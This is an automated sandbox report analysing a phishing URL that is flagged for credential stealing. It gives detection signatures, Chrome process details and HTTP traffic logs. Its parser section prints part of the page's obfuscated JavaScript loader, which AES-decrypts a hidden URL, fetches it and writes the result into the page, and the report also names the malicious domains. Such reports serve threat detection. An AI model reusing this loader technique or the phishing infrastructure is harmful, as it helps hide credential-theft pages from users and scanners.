Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://alinefrasca.sbs/pktcr/

Overview

General Information

Sample URL:https://alinefrasca.sbs/pktcr/
Analysis ID:1543707
Infos:

Detection

HTMLPhisher
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected HtmlPhish70
Phishing site detected (based on shot match)
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64
  • chrome.exe (PID: 2344 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 1148 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 --field-trial-handle=2296,i,4055844674821034473,7721358641859555857,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6312 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://alinefrasca.sbs/pktcr/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
1.2.pages.csvJoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: https://alinefrasca.sbs/pktcr/SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering

    Phishing

    barindex
    Source: Yara matchFile source: 1.2.pages.csv, type: HTML
    Source: https://alinefrasca.sbs/pktcr/Matcher: Template: captcha matched
    Source: https://alinefrasca.sbs/pktcr/Matcher: Template: captcha matched
    Source: https://alinefrasca.sbs/pktcr/HTTP Parser: Number of links: 0
    Source: https://alinefrasca.sbs/pktcr/HTTP Parser: Base64 decoded: {"a":"EHrFF8AwGMzbQW1g6xY\/m+uLkfYGVXtplHnxLG3GJ1s=","c":"a083c189ad0aadcfe0dd4bcb7934a640","b":"ab5798a1529461e4b50595d04a0ea599db63cf2a48941e3fef9ea693068b522776c799cb7715499de5de9ea897cab59906351655dabe115a951482247c1edb6fe7a7af318df0b9fb07d7f3e989e5df...
    Source: https://alinefrasca.sbs/pktcr/HTTP Parser: Title: Adrenaline Rush Motorsports - cooklght.ru does not match URL
    Source: https://cooklght.ru//#inventoryHTTP Parser: Title: Adrenaline Rush Motorsports - cooklght.ru does not match URL
    Source: https://alinefrasca.sbs/pktcr/HTTP Parser: asyncfunctionfacilitator(xenophobic) { var{a,b,c,d}= json.parse(xenophobic); return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d),cryptojs.enc.hex.parse(b), {hasher:cryptojs.algo.sha512, keysize: 64/8, iterations: 999}), {iv:cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } (async() => {document.write(awaitfacilitator(await (await fetch(awaitfacilitator(atob(`eyjhijoiruhyrky4qxdhtxpiuvcxzzz4wvwvbst1tgtmwudwwhrwbehueexhm0dkmxm9iiwiyyi6imewodnjmtg5ywqwywfky2zlmgrkngjjyjc5mzrhnjqwiiwiyii6imfintc5ogexnti5ndyxztrinta1otvkmdrhmgvhntk5zgi2m2nmmme0odk0mwuzzmvmowvhnjkzmdy4yjuymjc3nmm3otljyjc3mtu0otlkztvkztllytg5n2nhyju5ota2mzuxnju1zgfiztexnwe5nte0odiynddjmwvkyjzmztdhn2fmmze4zgywyjlmyja3zddmm2u5odllnwrmn2i3zgmyotk2ztvhmwe4zgu4zjm2mduxmgvmotmwmtiznwfmywyxzme3n2qymgeynja0mgrknzc2zja1nzk2mzu5nmq0ytrkm2rlzmu0m2rimju2mdjkztk1nmmzodu0ywnjnzgxm2e2nwe3mwiymtbmmtm5nde3mje5mzu4nwq4otcwotqxztayzty5ndhhzgy1n2q5ymm3odhjnje1nju2mgjhodrlnzgyodhi...
    Source: https://alinefrasca.sbs/pktcr/HTTP Parser: No favicon
    Source: https://alinefrasca.sbs/pktcr/HTTP Parser: No favicon
    Source: https://alinefrasca.sbs/pktcr/HTTP Parser: No favicon
    Source: https://cooklght.ru//#inventoryHTTP Parser: No favicon
    Source: https://alinefrasca.sbs/pktcr/HTTP Parser: No <meta name="author".. found
    Source: https://cooklght.ru//#inventoryHTTP Parser: No <meta name="author".. found
    Source: https://alinefrasca.sbs/pktcr/HTTP Parser: No <meta name="copyright".. found
    Source: https://cooklght.ru//#inventoryHTTP Parser: No <meta name="copyright".. found
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49743 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49746 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49792 version: TLS 1.2
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /pktcr/ HTTP/1.1Host: alinefrasca.sbsConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alinefrasca.sbs/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e1a56f38220d/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alinefrasca.sbs/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/50l31/0x4AAAAAAAySkc1zVXc3ztAP/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://alinefrasca.sbs/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
    Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/e1a56f38220d/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d9998e48bc0e98b&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/50l31/0x4AAAAAAAySkc1zVXc3ztAP/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/50l31/0x4AAAAAAAySkc1zVXc3ztAP/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: alinefrasca.sbsConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://alinefrasca.sbs/pktcr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=0vnljmd907ev27c68sitpt9phh
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8d9998e48bc0e98b&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/101271322:1730103188:6HRbbJs87_HiCSIrxrZZgbsUH28xnY_4sVI_cjvAKEk/8d9998e48bc0e98b/S8ymOwDctYV1XFZLWDWFqSNHTXkEi0WpttSETzX6a4Y-1730104576-1.1.1.1-_4T1_B3uixuUg0D4_NLdSkm6NbVh1yndlqULNzvY0xOHel8g6vvphEUB.BRwm5rE HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d9998e48bc0e98b/1730104580520/7FQTXkX5ZkBqsD6 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/50l31/0x4AAAAAAAySkc1zVXc3ztAP/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d9998e48bc0e98b/1730104580520/7FQTXkX5ZkBqsD6 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8d9998e48bc0e98b/1730104580522/2e00cf1394d42c89cdf811406f5e4269e35051a7617a342d077837e4d476bf20/0obqbK39GmXmtGT HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/50l31/0x4AAAAAAAySkc1zVXc3ztAP/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/101271322:1730103188:6HRbbJs87_HiCSIrxrZZgbsUH28xnY_4sVI_cjvAKEk/8d9998e48bc0e98b/S8ymOwDctYV1XFZLWDWFqSNHTXkEi0WpttSETzX6a4Y-1730104576-1.1.1.1-_4T1_B3uixuUg0D4_NLdSkm6NbVh1yndlqULNzvY0xOHel8g6vvphEUB.BRwm5rE HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/101271322:1730103188:6HRbbJs87_HiCSIrxrZZgbsUH28xnY_4sVI_cjvAKEk/8d9998e48bc0e98b/S8ymOwDctYV1XFZLWDWFqSNHTXkEi0WpttSETzX6a4Y-1730104576-1.1.1.1-_4T1_B3uixuUg0D4_NLdSkm6NbVh1yndlqULNzvY0xOHel8g6vvphEUB.BRwm5rE HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://alinefrasca.sbs/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.5.0/css/all.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://alinefrasca.sbs/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /npm/bootstrap@5.3.0/dist/css/bootstrap.min.css HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://alinefrasca.sbs/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET // HTTP/1.1Host: cooklght.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.5.0/webfonts/fa-solid-900.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://alinefrasca.sbssec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ajax/libs/font-awesome/6.5.0/webfonts/fa-brands-400.woff2 HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://alinefrasca.sbssec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET // HTTP/1.1Host: cooklght.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://alinefrasca.sbs/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js HTTP/1.1Host: cooklght.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://cooklght.ru//Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
